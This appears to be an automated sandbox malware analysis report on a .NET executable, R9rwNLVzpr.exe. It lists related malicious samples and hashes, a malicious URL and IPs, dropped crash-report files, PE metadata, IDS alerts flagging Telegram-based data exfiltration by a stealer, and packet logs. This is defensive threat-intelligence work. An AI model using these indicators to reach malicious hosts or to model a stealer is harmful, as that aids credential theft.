	https://nr.sssage.top/	Get hash	malicious	Unknown	Browse	172.67.215.30
	fffffffsa.exe	Get hash	malicious	Salat Stealer	Browse	172.67.191.102

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	#rfq=O250116 - #U304a#U3088#U3073#U8cfc#U5165#U5951#U7d04- Offer Z01G-00008D SUPPLY - H64PO.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.26.1.100
	PAGOS RETRASADOS.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.26.1.100
	Invoice.exe	Get hash	malicious	Snake Keylogger	Browse	104.26.1.100
	kissingwithbestexperiencedgirlfriendonhereformenice.hta	Get hash	malicious	Cobalt Strike, MSIL Logger, MassLogger RAT	Browse	104.26.1.100
	PO202503S.xlsm	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.26.1.100
	niceworkingskillwithbestideasevermade.hta	Get hash	malicious	Cobalt Strike, MSIL Logger, MassLogger RAT	Browse	104.26.1.100
	QUOTATION_FEBQUOTE312025PDF.scr.exe	Get hash	malicious	MSIL Logger	Browse	104.26.1.100
	New Order RFQ- 19A20060.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.26.1.100
	EM#U0130R_7880330875661236965345096345789_3479653.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.26.1.100
	INQ_NO_097590_0109_Order.cmd	Get hash	malicious	DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	104.26.1.100
3b5074b1b5d032e5620f69f9f700ff0e	ScreenSync.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.220
	nobtpajdjthawd.exe	Get hash	malicious	Keyzetsu Clipper	Browse	149.154.167.220
	Arly.exe	Get hash	malicious	Discord Token Stealer, PRYSMAX STEALER, RHADAMANTHYS, Xmrig	Browse	149.154.167.220
	KoaguarLoader.exe	Get hash	malicious	Salat Stealer, XWorm	Browse	149.154.167.220
	Solara Executor.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	Update.Client.exe	Get hash	malicious	ScreenConnect Tool	Browse	149.154.167.220
	Update.Client.exe	Get hash	malicious	ScreenConnect Tool	Browse	149.154.167.220
	publicpublicpublic.xll.ps1	Get hash	malicious	LummaC Stealer	Browse	149.154.167.220
	T&S-WAN FUNG GMT FTY LTD (CW0007)-Statement as at 28 Feb 2025.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	ftaHTqkV.posh.ps1	Get hash	malicious	Unknown	Browse	149.154.167.220

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_R9rwNLVzpr.exe_7c2b2a7146f988ee3bcf888ea78159f2dbd1c15_635628c3_d6139913-86aa-40fd-a825-c6436ad5351d\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.3859166240861795
Encrypted:	false
SSDEEP:	192:GHakSlIr0x+WNaWBtlT9V8j9vs7ZFjozuiFTZ24lO8u:DZlXx+WNamPKvsTozuiFTY4lO8u
MD5:	0E3C7B440B652BC0879B77560D1193D3
SHA1:	EE88792E8DC302CA0B852CFD76C3980229E52876
SHA-256:	82E98FF4BFDBF5B120468B6F6BC2E7285B656121A6711A607406B03D88B83587
SHA-512:	A564034DB8DCB79FD58A932428B2FA93F8334D75EA28E5DEB865D2F599EC186FF4BB300BAD6D10A2E672A01E2B8C9DA0F421B74674B610C7B8DBD8FDFFA3B790
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.1.8.6.6.9.9.5.1.5.9.1.6.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.6.1.8.6.7.0.0.5.0.0.9.0.9.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.6.1.3.9.9.1.3.-.8.6.a.a.-.4.0.f.d.-.a.8.2.5.-.c.6.4.3.6.a.d.5.3.5.1.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.a.1.9.4.e.8.a.-.c.6.6.9.-.4.f.8.a.-.9.f.c.5.-.7.a.f.2.b.1.b.d.2.d.3.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.R.9.r.w.N.L.V.z.p.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.s.y.s.t.e.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.f.4.-.0.0.0.1.-.0.0.1.8.-.8.2.c.b.-.d.c.9.8.a.8.9.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.4.3.6.b.7.d.5.5.e.3.c.d.d.a.f.0.e.6.3.8.b.f.d.2.7.4.9.7.5.8.5.0.0.0.0.0.0.0.0.!.0.0.0.0.5.1.6.7.f.a.0.c.1.f.5.7.7.1.e.2.a.2.4.a.a.b.9.c.2.5.6.3.3.e.8.1.b.b.d.a.e.1.5.7.!.R.9.r.w.N.L.V.z.p.r...e.x.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1224.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	9086
Entropy (8bit):	3.7073585007657246
Encrypted:	false
SSDEEP:	192:R6l7wVeJrmVRE6YV12PgmfZaZpr189bGQ3feCm:R6lXJag6Yn2PgmfQGG4fy
MD5:	75B020325C7D604036ACD0E6DFBA8EFF
SHA1:	C4FD55BAB4CADC5E9F579DD0834FAE0F756522ED
SHA-256:	4E813A64DF7B3E43323F13A3263C58B07CADF8376FBB6E2686776A0E415F46DE
SHA-512:	6D0B1D3F3A835CB889753FC52E1C8CDD775F48F88D1854CA61EDCE63EB9090511D16D23EECFD176063561D13A9FCEF34D8D494207AAD37AC73B409F7C1FF4285
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.2.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER12A2.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4788
Entropy (8bit):	4.468695811957432
Encrypted:	false
SSDEEP:	48:cvIwWl8zsNrJg771I9cPWOa8t7Ym8M4JN/FOHoyq8vVzKayvd:uIjfNFI7reOlMJKHoWNKayvd
MD5:	EFCA6C7CE9334FE3A04D17D76F91A73F
SHA1:	9B4BB744AC2EC7B573114C08F031F636A57CEAC0
SHA-256:	60988C8B4F3D74E7EF8DC053B2A5B7FBF12E810F9BC1CBBDCAFA842636098C56
SHA-512:	679C32E0DBB852778A6EE7EC521FEDA376AFBF5A37B836DA8FC21F07D778650FBDC3F8A38C5F7701C7C352615C75DB1ABBC3EFA2B8263AE2CCBC1ADC0DB4EED8
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="756494" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF92.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Tue Mar 11 17:11:40 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	683550
Entropy (8bit):	3.214912823957287
Encrypted:	false
SSDEEP:	3072:CWXd+kfW2HGeNA4RL43W834CY2ZScS0PNXpppwo+Qpls3e1CCq//3+v1ioVmfyBK:CWXdnGeNvQI/0ppppwnkq//3QI
MD5:	45134521333B8C3EE6C929E9C9395FDD
SHA1:	5A6BB1937D9765A1066CD5105095D0E0BF3CB1F4
SHA-256:	1020D983EACD7966119C1BA60748EA14F4462194156057DCDBA2ED272712E8E9
SHA-512:	B688DDC069FDA4D8EEB44C0D718AA824ABA2A59184FFE67A575762379E86A65679CDAAF49E38BC5B93381E76E796C76E527329B6FED7CB9EED874783795820C0
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........n.g.........................'..........<....2.......=...2.....................l.......8...........T............b...............p...........r..............................................................................eJ......$s......Lw......................T............n.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.46523712737448
Encrypted:	false
SSDEEP:	6144:MhyS6Wwrm/Ivk8bWdx0W0cAdQa8WMFlnOvAeoMqWu8O/RRhDYYdqXVhE:oyJKF0fBvAexuTLdLdwE
MD5:	86F41FBDA457B499C9B37180187E1F31
SHA1:	CAA310E76DAEDE05C8A9A4B5BA81DCC6F2B8A09A
SHA-256:	FB96343233851BC7A9772CF3D70C8CA4EB731A69D1607DDED6E1BF36F4F522D6
SHA-512:	DF4586F41695432C0E2026BB0F4C5F1EB32BDCB54FF9F9D241EE35FEF9C68DDBF3DB02F364CA4BC10E95B964DE0DD78739A537B705FBD86F8C18DA60CBC3E741
Malicious:	false
Reputation:	low
Preview:	regfL...L....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.;..b...............................................................................................................................................................................................................................................................................................................................................:>..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	57344
Entropy (8bit):	3.8444403838221763
Encrypted:	false
SSDEEP:	768:Fzfl5ZSqQf5ptI6/i63hp/VchuhMRPCKtZ0CVikQA2mv+MvyfRou6NWiW:FztE5ptrdrGx+4ba
MD5:	BD7103BDFBFFA1C17106107BED9FD1AD
SHA1:	5CED4EB27734397BBA7222291704678DE401C658
SHA-256:	CECF880CF56088529EE44F28D791043174AA6021DC2F4F75EEC26B8BB1619063
SHA-512:	942BBAAA4719844509992D77ACE3D4A8338FCF9B6CA44CF903F38859D4BEF637867C614EE8C5075018868BB07F2AC57AEA8E202FC6D9A164195961CBCA564066
Malicious:	false
Reputation:	low
Preview:	regfK...K....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.;..b...............................................................................................................................................................................................................................................................................................................................................<>..HvLE........K............n[tO..!....!............p...................................................0..hbin.................\.Z............nk,..\.Z......... ..........h...................................<.......&...{11517B7C-E79D-4e20-961B-75A811715ADD}..`...sk..........@...........\...l.............H.........?...................?...................?........... ... ........... ... ...................$.N..........vk..4...`...........CreatingCommand.....O.n.e.D.r.i.v.e.S.e.t.u.p...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.5212062963241255
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.98% Win32 Executable (generic) a (10002005/4) 49.93% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	R9rwNLVzpr.exe
File size:	653'312 bytes
MD5:	16e8183843e73d742ee2f2d334b8c6c0
SHA1:	5167fa0c1f5771e2a24aab9c25633e81bbdae157
SHA256:	02d192483999e1acbe80fa6ee612b56d8768033a6018c9a5b95199943c82e683
SHA512:	78bf5431ddb73c4fb20de9fd3be00d8a5272a52882636f19a70b49bb871b122e35f71561dbf05aa90db8d3df815597deb1edda2e93070cc078bd7d3ee103052d
SSDEEP:	12288:cJpXH/IUgy21XWno5EMbU0+gIT5F7k75aps:cJpXH/idWnoaf6IE753
TLSH:	B3D4D024BEE54999F18E83B5D7E864A59FF2F699B14BF3FB160427912F03750C80312A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...QlCg.........."...0.. ..........%M... ...@....@.. ....................................@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4a4d25
Entrypoint Section:	.hJL
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67436C51 [Sun Nov 24 18:11:29 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00468000h]
adc al, 51h
jne 00007FBCC8DC52BAh
mov ah, 86h
aaa
or eax, 09A63753h
dec esp
insd
pop ebx
in eax, 20h
jns 00007FBCC8DC5243h
mov bl, A8h
pop ss
inc ecx
push ebp
aaa
ror esp, cl
test edi, eax
adc byte ptr [edx], al
insd
pop eax
loope 00007FBCC8DC523Bh
out dx, eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa5bbc	0x28	.hJL
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x10a000	0x5c6	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x10c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x68000	0x8	.W!:
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0xdf000	0x48	.hJL
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x21f24	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.:"%	0x24000	0x4240f	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.W!:	0x68000	0x8	0x200	e413766a3d8970529a55fa86ad690aa4	False	0.03125	data	0.06116285224115448	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.hJL	0x6a000	0x9e978	0x9ea00	0526f7cb913ae31383ddc537bef7ac13	False	0.7993421862687156	data	7.536963336777202	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x10a000	0x5c6	0x600	e1ced04f161248f762306e58aa39e121	False	0.4244791666666667	data	4.121957477822542	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x10c000	0xc	0x200	6fcd3334dc548100f0c11b6e0e53b2e3	False	0.048828125	data	0.12227588125913882	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x10a0a0	0x33c	data			0.4251207729468599
RT_MANIFEST	0x10a3dc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
Comments
CompanyName
FileDescription	Windows Application
FileVersion	1.0.0.0
InternalName	system.exe
LegalCopyright	Copyright 2023
LegalTrademarks
OriginalFilename	system.exe
ProductName	Windows Application
ProductVersion	1.0.0.0
Assembly Version	1.0.0.0

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-11T18:11:37.400867+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	49727	149.154.167.220	443	TCP
2025-03-11T18:11:37.401783+0100	1800010	Joe Security MALWARE Phemedrone - Telegram Exfil	1	192.168.2.5	49727	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 11, 2025 18:11:21.484349012 CET	49714	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:21.484438896 CET	443	49714	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:21.484944105 CET	49714	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:21.485366106 CET	49714	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:21.485409975 CET	443	49714	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:22.131843090 CET	49714	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:22.132169962 CET	49720	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:22.132252932 CET	443	49720	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:22.133172035 CET	49720	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:22.134111881 CET	49720	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:22.134162903 CET	443	49720	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:22.167063951 CET	49721	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:22.167114019 CET	443	49721	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:22.167378902 CET	49721	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:22.167740107 CET	49721	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:22.167757988 CET	443	49721	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:22.172367096 CET	443	49714	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:22.245810986 CET	49722	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:22.245851994 CET	443	49722	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:22.247579098 CET	49722	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:22.247956991 CET	49722	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:22.247975111 CET	443	49722	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:22.280714035 CET	49723	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:22.280760050 CET	443	49723	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:22.281055927 CET	49723	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:22.281564951 CET	49723	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:22.281578064 CET	443	49723	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:23.533459902 CET	443	49714	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:23.533576965 CET	443	49714	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:23.540328979 CET	443	49714	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:23.553190947 CET	49714	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:23.553206921 CET	49714	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:23.553222895 CET	49714	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:24.154274940 CET	443	49720	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:24.164359093 CET	49720	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:24.164370060 CET	443	49720	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:24.167480946 CET	443	49720	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:24.167684078 CET	443	49721	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:24.176331043 CET	443	49720	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:24.184580088 CET	49720	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:24.195959091 CET	49720	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:24.249752045 CET	49721	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:24.249780893 CET	443	49721	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:24.250745058 CET	443	49721	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:24.250757933 CET	443	49721	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:24.254914999 CET	49721	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:24.261559963 CET	443	49722	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:24.272265911 CET	49722	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:24.272294998 CET	443	49722	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:24.273196936 CET	443	49722	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:24.284323931 CET	443	49722	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:24.284841061 CET	49722	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:24.289279938 CET	443	49723	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:24.342396975 CET	49723	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:24.342422009 CET	443	49723	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:24.343501091 CET	443	49723	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:24.343513012 CET	443	49723	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:24.343919039 CET	49723	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:25.356369019 CET	49725	443	192.168.2.5	104.26.1.100
Mar 11, 2025 18:11:25.356411934 CET	443	49725	104.26.1.100	192.168.2.5
Mar 11, 2025 18:11:25.356478930 CET	49725	443	192.168.2.5	104.26.1.100
Mar 11, 2025 18:11:25.363337040 CET	49725	443	192.168.2.5	104.26.1.100
Mar 11, 2025 18:11:25.363351107 CET	443	49725	104.26.1.100	192.168.2.5
Mar 11, 2025 18:11:27.211227894 CET	443	49725	104.26.1.100	192.168.2.5
Mar 11, 2025 18:11:27.216336012 CET	443	49725	104.26.1.100	192.168.2.5
Mar 11, 2025 18:11:27.216383934 CET	49725	443	192.168.2.5	104.26.1.100
Mar 11, 2025 18:11:27.230947018 CET	49725	443	192.168.2.5	104.26.1.100
Mar 11, 2025 18:11:27.386475086 CET	49725	443	192.168.2.5	104.26.1.100
Mar 11, 2025 18:11:27.386497974 CET	443	49725	104.26.1.100	192.168.2.5
Mar 11, 2025 18:11:27.387810946 CET	443	49725	104.26.1.100	192.168.2.5
Mar 11, 2025 18:11:27.470947981 CET	49725	443	192.168.2.5	104.26.1.100
Mar 11, 2025 18:11:27.971067905 CET	49725	443	192.168.2.5	104.26.1.100
Mar 11, 2025 18:11:28.016328096 CET	443	49725	104.26.1.100	192.168.2.5
Mar 11, 2025 18:11:28.433301926 CET	443	49725	104.26.1.100	192.168.2.5
Mar 11, 2025 18:11:28.433630943 CET	443	49725	104.26.1.100	192.168.2.5
Mar 11, 2025 18:11:28.440136909 CET	49725	443	192.168.2.5	104.26.1.100
Mar 11, 2025 18:11:28.491656065 CET	49725	443	192.168.2.5	104.26.1.100
Mar 11, 2025 18:11:33.886612892 CET	443	49720	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:33.886677980 CET	49720	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:33.892292976 CET	443	49721	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:33.892395020 CET	49721	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:33.924340010 CET	443	49722	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:33.924500942 CET	49722	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:33.942218065 CET	443	49723	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:33.942454100 CET	49723	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:34.974998951 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:34.975038052 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:34.975111961 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:34.976022005 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:34.976043940 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.043926954 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.044023037 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.046211958 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.046230078 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.046464920 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.047411919 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.092324018 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.400196075 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.400217056 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.400680065 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.400718927 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.400851011 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.400969028 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.401078939 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.401335955 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.401371002 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.401417971 CET	49727	443	192.168.2.5	149.154.167.220
